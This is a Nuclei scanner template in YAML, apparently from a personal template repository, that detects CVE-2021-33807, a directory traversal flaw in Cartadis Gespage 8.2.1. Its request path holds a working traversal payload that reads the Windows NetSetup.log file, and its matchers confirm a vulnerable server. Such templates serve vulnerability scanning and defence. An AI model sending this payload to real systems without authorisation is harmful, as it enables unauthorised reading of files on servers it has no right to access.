my-nuclei-templates/CVE-2021-33807.yaml

43 lines
1.1 KiB
YAML

id: CVE-2021-33807
info:
name: Cartadis Gespage 8.2.1 - Directory Traversal
author: daffainfo
severity: high
description: Cartadis Gespage through 8.2.1 allows Directory Traversal in gespage/doDownloadData and gespage/webapp/doDownloadData.
reference:
- https://www.on-x.com/sites/default/files/on-x_-_security_advisory_-_gespage_-_cve-2021-33807.pdf
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33807
- https://www.gespage.com/cartadis-db/
- https://www.cartadis.com/gespage-website/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2021-33807
cwe-id: CWE-22
tags: cve,cve2021,lfi,gespage
requests:
- method: GET
path:
- "{{BaseURL}}/gespage/doDownloadData?file_name=../../../../../Windows/debug/NetSetup.log"
matchers-condition: and
matchers:
- type: word
words:
- "NetpDoDomainJoin:"
part: body
- type: word
words:
- "application/octet-stream"
part: header
- type: status
status:
- 200
# Enhanced by mp on 2022/03/30